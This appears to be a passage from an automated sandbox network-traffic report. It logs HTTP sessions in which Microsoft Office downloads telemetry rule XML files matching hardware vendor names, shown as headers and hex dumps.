R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	49775	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:00 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:00 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:00 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: 2e71ae26-601e-0097-6701-2df33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031300Z-16547b76f7fvllnfhC1DFWxkg800000007k000000000fymc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:00 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	49776	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:00 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:00 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:00 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 52c466ac-c01e-007a-7901-2db877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031300Z-16547b76f7ftdm8dhC1DFWs13g00000007fg00000000g406 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:00 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.4	49774	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:00 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:00 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:00 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: e9380aa8-701e-005c-5160-2ebb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031300Z-15869dbbcc6pfq2ghC1DFWmp1400000000t000000000ba0t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:00 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.4	49777	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:00 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:01 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:00 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: a814885b-f01e-0003-49e5-2e4453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031300Z-17df447cdb528ltlhC1DFWnt1c00000003q0000000004348 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:01 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	49778	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:00 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:01 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:01 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: def873b9-d01e-0065-46f7-2cb77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031301Z-16547b76f7f7scqbhC1DFW0m5w00000007e0000000009458 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:01 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.4	49781	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:01 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:01 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:01 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: 7c4c600e-301e-0052-675c-2e65d6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031301Z-17df447cdb57g7m7hC1DFW791s00000003sg0000000084p5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:01 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.4	49779	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:01 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:01 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:01 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 99102dbc-c01e-0066-43c1-2ca1ec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031301Z-16547b76f7fnm7lfhC1DFWkxt400000007h0000000004v2e x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:01 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	49780	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:01 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:01 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:01 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 7b5da9ca-601e-0050-1658-2e2c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031301Z-17df447cdb5vq4m4hC1DFWrbp800000003rg000000005k80 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:01 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	49782	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:01 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:01 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:01 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: 6bd3c087-001e-000b-13fd-2c15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031301Z-16547b76f7f7scqbhC1DFW0m5w00000007c000000000et9k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:01 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	49783	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:01 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:01 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:01 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 63ea3643-901e-0015-3101-2db284000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031301Z-16547b76f7fp6mhthC1DFWrggn00000007p000000000cpv7 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:01 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	49784	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:02 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:02 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:02 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: f9b7bb91-701e-0021-1460-2e3d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031302Z-15869dbbcc6j87jfhC1DFWky3s00000008u0000000000xwt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:02 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	49786	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:02 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:02 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:02 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: cc46dee9-d01e-007a-0efd-2cf38c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031302Z-16547b76f7fnlcwwhC1DFWz6gw00000007qg000000007g4g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:02 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 